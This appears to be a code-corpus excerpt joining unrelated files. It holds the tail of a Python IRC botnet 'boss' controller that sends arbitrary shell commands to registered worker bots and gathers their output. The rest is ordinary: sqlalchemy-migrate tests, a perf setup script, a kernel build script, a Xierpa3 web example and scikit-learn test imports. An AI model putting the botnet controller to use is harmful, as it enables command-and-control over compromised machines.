available -= (len(worker_nick) + 1)
if available <= 0 or sent == num_workers:
self.send_workers(msg_template % (','.join(send_to)))
available = msg_diff
send_to = []
self.send_user('Scheduled task: "%s" with id %s [%d workers]' % (
task.command, task.id, num_workers
))
def execute_task_once(self, nick, message, channel, command):
task = Task(command)
self.tasks[task.id] = task
worker = self.workers[random.choice(self.workers.keys())]
self.send_user('Scheduled task: "%s" with id %s - worker: [%s:%s]' % (
task.command, task.id, worker.nick, worker.name
))
self.respond('!worker-execute %s:%s' % (task.id, task.command), nick=worker.nick)
def print_task(self, nick, message, channel, task_id=None):
if not self.tasks:
return 'No tasks to print'
task_id = int(task_id or max(self.tasks.keys()))
task = self.tasks[task_id]
def printer(task):
for nick, data in task.data.iteritems():
worker = self.workers[nick]
self.send_user('[%s:%s] - %s' % (worker.nick, worker.name, task.command))
for line in data.splitlines():
self.send_user(line.strip())
gevent.sleep(.2)
gevent.spawn(printer, task)
def uptime(self, nick, message, channel):
curr = time.time()
seconds_diff = curr - self.start
hours, remainder = divmod(seconds_diff, 3600)
minutes, seconds = divmod(remainder, 60)
return 'Uptime: %d:%02d:%02d' % (hours, minutes, seconds)
def register(self, nick, message, channel, hostname):
if nick not in self.workers:
self.workers[nick] = BotnetWorker(nick, hostname)
self.logger.info('added worker [%s]' % nick)
else:
self.logger.warn('already registered [%s]' % nick)
return '!register-success %s' % self.cmd_channel
def unregister(self, worker_nick):
del(self.workers[worker_nick])
def status(self, nick, message, channel):
self.send_user('%s workers available' % len(self.workers))
self.send_user('%s tasks have been scheduled' % len(self.tasks))
def stop(self, nick, message, channel):
self.send_workers('!worker-stop')
def task_data(self, nick, message, channel, task_id, data):
# add the data to the task's data
self.tasks[int(task_id)].data[nick] += '%s\n' % data
def task_finished(self, nick, message, channel, task_id):
task = self.tasks[int(task_id)]
task.done(nick)
self.conn_logger.info('task [%s] finished by worker %s' % (task.id, nick))
self.logger.info('%s:%s:%s' % (task.id, nick, task.data))
if task.is_finished():
self.send_user('Task %s completed by %s workers' % (task.id, len(task.data)))
def task_received(self, nick, message, channel, task_id):
task = self.tasks[int(task_id)]
task.add(nick)
self.conn_logger.info('task [%s] received by worker %s' % (task.id, nick))
def worker_health_handler(self, nick, message, channel, hostname):
if nick in self.workers:
self.workers[nick].awaiting_ping.clear()
self.logger.debug('Worker [%s] is alive' % nick)
else:
self.register(nick, message, channel, hostname)
def help(self, nick, message, channel, hostname):
self.send_user('!execute (num workers) <command> -- run "command" on workers')
self.send_user('!print (task id) -- print output of tasks or task with id')
self.send_user('!stop -- tell workers to stop their current task')
self.send_user('!status -- get status on workers and tasks')
self.send_user('!uptime -- boss uptime')
def get_parser():
parser = OptionParser(usage='%prog [options]')
parser.add_option('--server', '-s', dest='server', default='irc.freenode.net',
help='IRC server to connect to')
parser.add_option('--port', '-p', dest='port', default=6667,
help='Port to connect on', type='int')
parser.add_option('--nick', '-n', dest='nick', default='boss1337',
help='Nick to use')
parser.add_option('--secret', '-x', dest='secret', default='password')
parser.add_option('--channel', '-c', dest='channel', default='#botwars-test')
parser.add_option('--logfile', '-f', dest='logfile')
parser.add_option('--verbosity', '-v', dest='verbosity', default=1, type='int')
return parser
if __name__ == '__main__':
parser = get_parser()
(options, args) = parser.parse_args()
conn = IRCConnection(options.server, options.port, options.nick,
options.logfile, options.verbosity)
bot = BotnetBot(conn, options.secret, options.channel)
bot.run()
| mit |
andras-tim/sqlalchemy-migrate | migrate/tests/versioning/test_script.py | 63 | 10322 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import imp
import os
import sys
import shutil
import six
from migrate import exceptions
from migrate.versioning import version, repository
from migrate.versioning.script import *
from migrate.versioning.util import *
from migrate.tests import fixture
from migrate.tests.fixture.models import tmp_sql_table
class TestBaseScript(fixture.Pathed):
def test_all(self):
"""Testing all basic BaseScript operations"""
# verify / source / run
src = self.tmp()
open(src, 'w').close()
bscript = BaseScript(src)
BaseScript.verify(src)
self.assertEqual(bscript.source(), '')
self.assertRaises(NotImplementedError, bscript.run, 'foobar')
class TestPyScript(fixture.Pathed, fixture.DB):
cls = PythonScript
def test_create(self):
"""We can create a migration script"""
path = self.tmp_py()
# Creating a file that doesn't exist should succeed
self.cls.create(path)
self.assertTrue(os.path.exists(path))
# Created file should be a valid script (If not, raises an error)
self.cls.verify(path)
# Can't create it again: it already exists
self.assertRaises(exceptions.PathFoundError,self.cls.create,path)
@fixture.usedb(supported='sqlite')
def test_run(self):
script_path = self.tmp_py()
pyscript = PythonScript.create(script_path)
pyscript.run(self.engine, 1)
pyscript.run(self.engine, -1)
self.assertRaises(exceptions.ScriptError, pyscript.run, self.engine, 0)
self.assertRaises(exceptions.ScriptError, pyscript._func, 'foobar')
# clean pyc file
if six.PY3:
os.remove(imp.cache_from_source(script_path))
else:
os.remove(script_path + 'c')
# test deprecated upgrade/downgrade with no arguments
contents = open(script_path, 'r').read()
f = open(script_path, 'w')
f.write(contents.replace("upgrade(migrate_engine)", "upgrade()"))
f.close()
pyscript = PythonScript(script_path)
pyscript._module = None
try:
pyscript.run(self.engine, 1)
pyscript.run(self.engine, -1)
except exceptions.ScriptError:
pass
else:
self.fail()
def test_verify_notfound(self):
"""Correctly verify a python migration script: nonexistant file"""
path = self.tmp_py()
self.assertFalse(os.path.exists(path))
# Fails on empty path
self.assertRaises(exceptions.InvalidScriptError,self.cls.verify,path)
self.assertRaises(exceptions.InvalidScriptError,self.cls,path)
def test_verify_invalidpy(self):
"""Correctly verify a python migration script: invalid python file"""
path=self.tmp_py()
# Create empty file
f = open(path,'w')
f.write("def fail")
f.close()
self.assertRaises(Exception,self.cls.verify_module,path)
# script isn't verified on creation, but on module reference
py = self.cls(path)
self.assertRaises(Exception,(lambda x: x.module),py)
def test_verify_nofuncs(self):
"""Correctly verify a python migration script: valid python file; no upgrade func"""
path = self.tmp_py()
# Create empty file
f = open(path, 'w')
f.write("def zergling():\n\tprint('rush')")
f.close()
self.assertRaises(exceptions.InvalidScriptError, self.cls.verify_module, path)
# script isn't verified on creation, but on module reference
py = self.cls(path)
self.assertRaises(exceptions.InvalidScriptError,(lambda x: x.module),py)
@fixture.usedb(supported='sqlite')
def test_preview_sql(self):
"""Preview SQL abstract from ORM layer (sqlite)"""
path = self.tmp_py()
f = open(path, 'w')
content = '''
from migrate import *
from sqlalchemy import *
metadata = MetaData()
UserGroup = Table('Link', metadata,
Column('link1ID', Integer),
Column('link2ID', Integer),
UniqueConstraint('link1ID', 'link2ID'))
def upgrade(migrate_engine):
metadata.create_all(migrate_engine)
'''
f.write(content)
f.close()
pyscript = self.cls(path)
SQL = pyscript.preview_sql(self.url, 1)
self.assertEqualIgnoreWhitespace("""
CREATE TABLE "Link"
("link1ID" INTEGER,
"link2ID" INTEGER,
UNIQUE ("link1ID", "link2ID"))
""", SQL)
# TODO: test: No SQL should be executed!
def test_verify_success(self):
"""Correctly verify a python migration script: success"""
path = self.tmp_py()
# Succeeds after creating
self.cls.create(path)
self.cls.verify(path)
# test for PythonScript.make_update_script_for_model
@fixture.usedb()
def test_make_update_script_for_model(self):
"""Construct script source from differences of two models"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertTrue("['User'].create()" in source_script)
self.assertTrue("['User'].drop()" in source_script)
@fixture.usedb()
def test_make_update_script_for_equal_models(self):
"""Try to make update script from two identical models"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source + self.model_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertFalse('User.create()' in source_script)
self.assertFalse('User.drop()' in source_script)
@fixture.usedb()
def test_make_update_script_direction(self):
"""Check update scripts go in the right direction"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertTrue(0
< source_script.find('upgrade')
< source_script.find("['User'].create()")
< source_script.find('downgrade')
< source_script.find("['User'].drop()"))
def setup_model_params(self):
self.script_path = self.tmp_py()
self.repo_path = self.tmp()
self.first_model_path = os.path.join(self.temp_usable_dir, 'testmodel_first.py')
self.second_model_path = os.path.join(self.temp_usable_dir, 'testmodel_second.py')
self.base_source = """from sqlalchemy import *\nmeta = MetaData()\n"""
self.model_source = """
User = Table('User', meta,
Column('id', Integer, primary_key=True),
Column('login', Unicode(40)),
Column('passwd', String(40)),
)"""
self.repo = repository.Repository.create(self.repo_path, 'repo')
self.pyscript = PythonScript.create(self.script_path)
sys.modules.pop('testmodel_first', None)
sys.modules.pop('testmodel_second', None)
def write_file(self, path, contents):
f = open(path, 'w')
f.write(contents)
f.close()
class TestSqlScript(fixture.Pathed, fixture.DB):
@fixture.usedb()
def test_error(self):
"""Test if exception is raised on wrong script source"""
src = self.tmp()
f = open(src, 'w')
f.write("""foobar""")
f.close()
sqls = SqlScript(src)
self.assertRaises(Exception, sqls.run, self.engine)
@fixture.usedb()
def test_success(self):
"""Test sucessful SQL execution"""
# cleanup and prepare python script
tmp_sql_table.metadata.drop_all(self.engine, checkfirst=True)
script_path = self.tmp_py()
pyscript = PythonScript.create(script_path)
# populate python script
contents = open(script_path, 'r').read()
contents = contents.replace("pass", "tmp_sql_table.create(migrate_engine)")
contents = 'from migrate.tests.fixture.models import tmp_sql_table\n' + contents
f = open(script_path, 'w')
f.write(contents)
f.close()
# write SQL script from python script preview
pyscript = PythonScript(script_path)
src = self.tmp()
f = open(src, 'w')
f.write(pyscript.preview_sql(self.url, 1))
f.close()
# run the change
sqls = SqlScript(src)
sqls.run(self.engine)
tmp_sql_table.metadata.drop_all(self.engine, checkfirst=True)
@fixture.usedb()
def test_transaction_management_statements(self):
"""
Test that we can successfully execute SQL scripts with transaction
management statements.
"""
for script_pattern in (
"BEGIN TRANSACTION; %s; COMMIT;",
"BEGIN; %s; END TRANSACTION;",
"/* comment */BEGIN TRANSACTION; %s; /* comment */COMMIT;",
"/* comment */ BEGIN TRANSACTION; %s; /* comment */ COMMIT;",
"""
-- comment
BEGIN TRANSACTION;
%s;
-- comment
COMMIT;""",
):
test_statement = ("CREATE TABLE TEST1 (field1 int); "
"DROP TABLE TEST1")
script = script_pattern % test_statement
src = self.tmp()
with open(src, 'wt') as f:
f.write(script)
sqls = SqlScript(src)
sqls.run(self.engine)
| mit |
codename13/kylessopen-3.4-port | tools/perf/util/setup.py | 4998 | 1330 | #!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='[email protected]',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
| gpl-2.0 |
NinjahMeh/android_kernel_huawei_angler | scripts/build-all.py | 704 | 14699 | #! /usr/bin/env python
# Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Build the kernel for all targets using the Android build environment.
from collections import namedtuple
import glob
from optparse import OptionParser
import os
import re
import shutil
import subprocess
import sys
import threading
import Queue
version = 'build-all.py, version 1.99'
build_dir = '../all-kernels'
make_command = ["vmlinux", "modules", "dtbs"]
all_options = {}
compile64 = os.environ.get('CROSS_COMPILE64')
def error(msg):
sys.stderr.write("error: %s\n" % msg)
def fail(msg):
"""Fail with a user-printed message"""
error(msg)
sys.exit(1)
if not os.environ.get('CROSS_COMPILE'):
fail("CROSS_COMPILE must be set in the environment")
def check_kernel():
"""Ensure that PWD is a kernel directory"""
if (not os.path.isfile('MAINTAINERS') or
not os.path.isfile('arch/arm/mach-msm/Kconfig')):
fail("This doesn't seem to be an MSM kernel dir")
def check_build():
"""Ensure that the build directory is present."""
if not os.path.isdir(build_dir):
try:
os.makedirs(build_dir)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
def build_threads():
"""Determine the number of build threads requested by the user"""
if all_options.load_average:
return all_options.load_average
return all_options.jobs or 1
failed_targets = []
BuildResult = namedtuple('BuildResult', ['status', 'messages'])
class BuildSequence(namedtuple('BuildSequence', ['log_name', 'short_name', 'steps'])):
def set_width(self, width):
self.width = width
def __enter__(self):
self.log = open(self.log_name, 'w')
def __exit__(self, type, value, traceback):
self.log.close()
def run(self):
self.status = None
messages = ["Building: " + self.short_name]
def printer(line):
text = "[%-*s] %s" % (self.width, self.short_name, line)
messages.append(text)
self.log.write(text)
self.log.write('\n')
for step in self.steps:
st = step.run(printer)
if st:
self.status = BuildResult(self.short_name, messages)
break
if not self.status:
self.status = BuildResult(None, messages)
class BuildTracker:
"""Manages all of the steps necessary to perform a build. The
build consists of one or more sequences of steps. The different
sequences can be processed independently, while the steps within a
sequence must be done in order."""
def __init__(self):
self.sequence = []
self.lock = threading.Lock()
def add_sequence(self, log_name, short_name, steps):
self.sequence.append(BuildSequence(log_name, short_name, steps))
def longest_name(self):
longest = 0
for seq in self.sequence:
longest = max(longest, len(seq.short_name))
return longest
def __repr__(self):
return "BuildTracker(%s)" % self.sequence
def run_child(self, seq):
seq.set_width(self.longest)
tok = self.build_tokens.get()
with self.lock:
print "Building:", seq.short_name
with seq:
seq.run()
self.results.put(seq.status)
self.build_tokens.put(tok)
def run(self):
self.longest = self.longest_name()
self.results = Queue.Queue()
children = []
errors = []
self.build_tokens = Queue.Queue()
nthreads = build_threads()
print "Building with", nthreads, "threads"
for i in range(nthreads):
self.build_tokens.put(True)
for seq in self.sequence:
child = threading.Thread(target=self.run_child, args=[seq])
children.append(child)
child.start()
for child in children:
stats = self.results.get()
if all_options.verbose:
with self.lock:
for line in stats.messages:
print line
sys.stdout.flush()
if stats.status:
errors.append(stats.status)
for child in children:
child.join()
if errors:
fail("\n ".join(["Failed targets:"] + errors))
class PrintStep:
"""A step that just prints a message"""
def __init__(self, message):
self.message = message
def run(self, outp):
outp(self.message)
class MkdirStep:
"""A step that makes a directory"""
def __init__(self, direc):
self.direc = direc
def run(self, outp):
outp("mkdir %s" % self.direc)
os.mkdir(self.direc)
class RmtreeStep:
def __init__(self, direc):
self.direc = direc
def run(self, outp):
outp("rmtree %s" % self.direc)
shutil.rmtree(self.direc, ignore_errors=True)
class CopyfileStep:
def __init__(self, src, dest):
self.src = src
self.dest = dest
def run(self, outp):
outp("cp %s %s" % (self.src, self.dest))
shutil.copyfile(self.src, self.dest)
class ExecStep:
def __init__(self, cmd, **kwargs):
self.cmd = cmd
self.kwargs = kwargs
def run(self, outp):
outp("exec: %s" % (" ".join(self.cmd),))
with open('/dev/null', 'r') as devnull:
proc = subprocess.Popen(self.cmd, stdin=devnull,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
**self.kwargs)
stdout = proc.stdout
while True:
line = stdout.readline()
if not line:
break
line = line.rstrip('\n')
outp(line)
result = proc.wait()
if result != 0:
return ('error', result)
else:
return None
class Builder():
def __init__(self, name, defconfig):
self.name = name
self.defconfig = defconfig
self.confname = self.defconfig.split('/')[-1]
# Determine if this is a 64-bit target based on the location
# of the defconfig.
self.make_env = os.environ.copy()
if "/arm64/" in defconfig:
if compile64:
self.make_env['CROSS_COMPILE'] = compile64
else:
fail("Attempting to build 64-bit, without setting CROSS_COMPILE64")
self.make_env['ARCH'] = 'arm64'
else:
self.make_env['ARCH'] = 'arm'
self.make_env['KCONFIG_NOTIMESTAMP'] = 'true'
self.log_name = "%s/log-%s.log" % (build_dir, self.name)
def build(self):
steps = []
dest_dir = os.path.join(build_dir, self.name)
log_name = "%s/log-%s.log" % (build_dir, self.name)
steps.append(PrintStep('Building %s in %s log %s' %
(self.name, dest_dir, log_name)))
if not os.path.isdir(dest_dir):
steps.append(MkdirStep(dest_dir))
defconfig = self.defconfig
dotconfig = '%s/.config' % dest_dir
savedefconfig = '%s/defconfig' % dest_dir
staging_dir = 'install_staging'
modi_dir = '%s' % staging_dir
hdri_dir = '%s/usr' % staging_dir
steps.append(RmtreeStep(os.path.join(dest_dir, staging_dir)))
steps.append(ExecStep(['make', 'O=%s' % dest_dir,
self.confname], env=self.make_env))
if not all_options.updateconfigs:
# Build targets can be dependent upon the completion of
# previous build targets, so build them one at a time.
cmd_line = ['make',
'INSTALL_HDR_PATH=%s' % hdri_dir,
'INSTALL_MOD_PATH=%s' % modi_dir,
'O=%s' % dest_dir]
build_targets = []
for c in make_command:
if re.match(r'^-{1,2}\w', c):
cmd_line.append(c)
else:
build_targets.append(c)
for t in build_targets:
steps.append(ExecStep(cmd_line + [t], env=self.make_env))
# Copy the defconfig back.
if all_options.configs or all_options.updateconfigs:
steps.append(ExecStep(['make', 'O=%s' % dest_dir,
'savedefconfig'], env=self.make_env))
steps.append(CopyfileStep(savedefconfig, defconfig))
return steps
def update_config(file, str):
print 'Updating %s with \'%s\'\n' % (file, str)
with open(file, 'a') as defconfig:
defconfig.write(str + '\n')
def scan_configs():
"""Get the full list of defconfigs appropriate for this tree."""
names = []
arch_pats = (
r'[fm]sm[0-9]*_defconfig',
r'apq*_defconfig',
r'qsd*_defconfig',
r'mdm*_defconfig',
r'mpq*_defconfig',
)
arch64_pats = (
r'msm*_defconfig',
)
for p in arch_pats:
for n in glob.glob('arch/arm/configs/' + p):
name = os.path.basename(n)[:-10]
names.append(Builder(name, n))
if 'CROSS_COMPILE64' in os.environ:
for p in arch64_pats:
for n in glob.glob('arch/arm64/configs/' + p):
name = os.path.basename(n)[:-10] + "-64"
names.append(Builder(name, n))
return names
def build_many(targets):
print "Building %d target(s)" % len(targets)
# If we are requesting multiple builds, divide down the job number
# to construct the make_command, giving it a floor of 2, so there
# is still some parallelism.
if all_options.jobs and all_options.jobs > 1:
j = max(all_options.jobs / len(targets), 2)
make_command.append("-j" + str(j))
tracker = BuildTracker()
for target in targets:
if all_options.updateconfigs:
update_config(target.defconfig, all_options.updateconfigs)
steps = target.build()
tracker.add_sequence(target.log_name, target.name, steps)
tracker.run()
def main():
global make_command
check_kernel()
check_build()
configs = scan_configs()
usage = ("""
%prog [options] all -- Build all targets
%prog [options] target target ... -- List specific targets
%prog [options] perf -- Build all perf targets
%prog [options] noperf -- Build all non-perf targets""")
parser = OptionParser(usage=usage, version=version)
parser.add_option('--configs', action='store_true',
dest='configs',
help="Copy configs back into tree")
parser.add_option('--list', action='store_true',
dest='list',
help='List available targets')
parser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='Output to stdout in addition to log file')
parser.add_option('--oldconfig', action='store_true',
dest='oldconfig',
help='Only process "make oldconfig"')
parser.add_option('--updateconfigs',
dest='updateconfigs',
help="Update defconfigs with provided option setting, "
"e.g. --updateconfigs=\'CONFIG_USE_THING=y\'")
parser.add_option('-j', '--jobs', type='int', dest="jobs",
help="Number of simultaneous jobs")
parser.add_option('-l', '--load-average', type='int',
dest='load_average',
help="Don't start multiple jobs unless load is below LOAD_AVERAGE")
parser.add_option('-k', '--keep-going', action='store_true',
dest='keep_going', default=False,
help="Keep building other targets if a target fails")
parser.add_option('-m', '--make-target', action='append',
help='Build the indicated make target (default: %s)' %
' '.join(make_command))
(options, args) = parser.parse_args()
global all_options
all_options = options
if options.list:
print "Available targets:"
for target in configs:
print " %s" % target.name
sys.exit(0)
if options.oldconfig:
make_command = ["oldconfig"]
elif options.make_target:
make_command = options.make_target
if args == ['all']:
build_many(configs)
elif args == ['perf']:
targets = []
for t in configs:
if "perf" in t.name:
targets.append(t)
build_many(targets)
elif args == ['noperf']:
targets = []
for t in configs:
if "perf" not in t.name:
targets.append(t)
build_many(targets)
elif len(args) > 0:
all_configs = {}
for t in configs:
all_configs[t.name] = t
targets = []
for t in args:
if t not in all_configs:
parser.error("Target '%s' not one of %s" % (t, all_configs.keys()))
targets.append(all_configs[t])
build_many(targets)
else:
parser.error("Must specify a target to build, or 'all'")
if __name__ == "__main__":
main()
| gpl-2.0 |
petrvanblokland/Xierpa3 | xierpa3/sites/examples/helloworldpages/make.py | 1 | 8420 | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# make.py
#
import webbrowser
from xierpa3.components import Theme, Page, Column
from xierpa3.builders.cssbuilder import CssBuilder
from xierpa3.builders.htmlbuilder import HtmlBuilder
from xierpa3.attributes import Em, Margin, Color, Perc
BODYFAMILY = 'Georgia, serif'
class BaseHelloWorldText(Column):
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Column.C
def buildBlock(self, b):
u"""Build a content base class. Inherited by specific HelloWorld... classes
that define the method **self.helloWorldText(b). In this example the CSS parameter
are still defined inside the block. Different from the real usage of BluePrint API parameter,
that allow modification from including components or inheriting components."""
b.div(class_=self.getClassName(), margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width='70%', maxwidth=700, minwidth=300, backgroundcolor='#222',
padding=Em(0.5), fontfamily=BODYFAMILY, fontsize=Em(4), textalign=self.C.CENTER,
lineheight=Em(1.4))
self._helloWorldText(b)
b._div()
b.div(class_=self.C.CLASS_CAPTION, color=Color('#888'),
margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width=Perc(70), maxwidth=700, minwidth=300,
paddingleft=Em(0.5), fontfamily=BODYFAMILY, fontsize=Em(0.8),
textalign=self.C.CENTER, lineheight=Em(1.4), fontstyle=self.C.ITALIC)
b.text('Intentionally non-responsive page example. Generated by Xierpa3.')
b._div()
class HelloWorldHome(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('yellow')) # Color name will be translate to more reliable hex code.
b.text('Hello, world!')
b._div()
# TODO: Needs to clean up. JSON example goes to separate example site.
def buildAjaxDict(self, site, d):
myD = d['HelloWorldHome'] = {}
myD['name'] = 'Petr'
myD['message'] = 'Hello'
myD['fontName'] = site.e.form['font'] or 'notdefined'
return d
class HelloWorldOther1(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('#00FF00')) # Show the text on this page in another color, to visualize the difference.
# TODO: Needs to clean up. JSON example goes to separate example site.
b.a(href='/ajax/font-MyFont')
b.text('Hello, world on another page using MyFont')
b._a()
b._div()
# TODO: Needs to clean up. JSON example goes to separate example site.
def buildAjaxDict(self, site, d):
myD = d['HelloWorldOther1'] = {}
myD['message'] = 'Hello ' * 10
return d
class HelloWorldOther2(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('#00FFFF')) # Show the text on this page in another color, to visualize the difference.
b.text('And yet another world on this page.')
b._div()
class Navigation(Column):
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Column.C
def buildBlock(self, b):
b.div(class_=self.getClassName(), margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width=Perc(40), maxwidth=700, minwidth=300, backgroundcolor=Color('#DDD'),
padding=Em(0.5), fontfamily=BODYFAMILY, textalign=self.C.CENTER)
# Still doing content and page identifiers directly, without adapter, in this example.
b.text(' | ')
for pageId in HelloWorldPages.PAGES:
# Making a reference to the page class is enough to build the url.
b.a(href='/'+pageId, fontsize=Em(1), color=Color('#444'))
b.text(pageId.capitalize()) # Make simple label in the menu from page id..
b._a()
b.text(' | ')
b._div()
class HelloWorldPages(Theme):
u"""The **HelloWorldLayout** class implements a basic "Hello, world!" page, running as
batch process, saving the result as an HTML file. Also it is available in the example webserver,
e.g. through the Xierpa3App."""
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Theme.C
TITLE = u'The layout version of "Hello, world!" page.' # Use as title of window.
TEMPLATE_OTHER1 = 'other'
TEMPLATE_OTHER2 = 'otherworld'
PAGES = (C.TEMPLATE_INDEX, TEMPLATE_OTHER1, TEMPLATE_OTHER2)
def baseComponents(self):
u"""Create a theme site with just one single template home page. Answer a list
of page instances that are used as templates for this site."""
# Create an instance (=object) of the text component to be placed on the page.
navigation = Navigation()
home = HelloWorldHome() # Example text component for the home page.
other1 = HelloWorldOther1() # Example text component for the other1Page
other2 = HelloWorldOther2() # Example text component for the other2Page
# Create an instance (=object) of the page, containing the "hw" component.
# The class is also the page name in the url. The navigation simply refers
# to the url by class nane.
homePage = Page(class_=self.C.TEMPLATE_INDEX, components=(navigation, home),
title=self.TITLE + '|' + self.C.TEMPLATE_INDEX)
other1Page = Page(class_=self.TEMPLATE_OTHER1, components=(navigation, other1),
title=self.TITLE + '|' + self.TEMPLATE_OTHER1)
other2Page = Page(class_=self.TEMPLATE_OTHER2, components=(navigation, other2),
title=self.TITLE + '|' + self.TEMPLATE_OTHER2)
# Answer a list of types of pages for this site.
return [homePage, other1Page, other2Page]
def make(self, root=None):
u"""The instance of this class builds CSS and HTML files at the optional path **root**.
If not defined, then the default ~/Desktop/Xierpa3Examples/[component.name] is used as export path,
as set by Builder.DEFAULT_ROOTPATH"""
# Create an "instance" (=object) of type "HelloWorldLayout". The type (=class) defines
# the behavior of the object that is made by calling the class.
# C S S
# Create the main CSS builder instance to build the SASS/CSS part of the site.
cssBuilder = CssBuilder()
# Compile (=build) the SCSS to CSS and save the file in "css/style.css".
self.build(cssBuilder) # Build from entire site theme, not just from template. Result is stream in builder.
cssBuilder.save(self, root)
# H T M L
# Create the main HTML builder instance to build the HTML part of the site.
htmlBuilder = HtmlBuilder()
# Compile the HTML and save the resulting HTML file in "helloWorld.html".
self.build(htmlBuilder) # Build from entire site theme, not just from template. Result is stream in builder.
# Answer the path, so we can directly open the file with a browser.
return htmlBuilder.save(self, root)
if __name__ == '__main__':
# TODO: Why is the browser loading the CSS for every page?
# This construction "__name__ == '__main__'" makes this Python file only
# be executed when called in direct mode, such as "python make.py" in the terminal.
# Since no rootPath is added to make(), the file export is in ~/Desktop/Xierpa3Examples/HelloWorldLayout/
path = HelloWorldPages().make()
webbrowser.open(path)
| mit |
anntzer/scikit-learn | sklearn/tests/test_multiclass.py | 5 | 32749 | import numpy as np
import scipy.sparse as sp
import pytest
from re import escape
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import ignore_warnings
from sklearn.utils._mocking import CheckingClassifier
from sklearn.multiclass import OneVsRestClassifier
from sklearn.multiclass import OneVsOneClassifier
from sklearn.multiclass import OutputCodeClassifier
from sklearn.utils.multiclass import (check_classification_targets,
type_of_target)
from sklearn.utils import (
check_array,
shuffle,
)
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.svm import LinearSVC, SVC
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import (LinearRegression, Lasso, ElasticNet, Ridge,
Perceptron, LogisticRegression,
SGDClassifier)
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline, make_pipeline
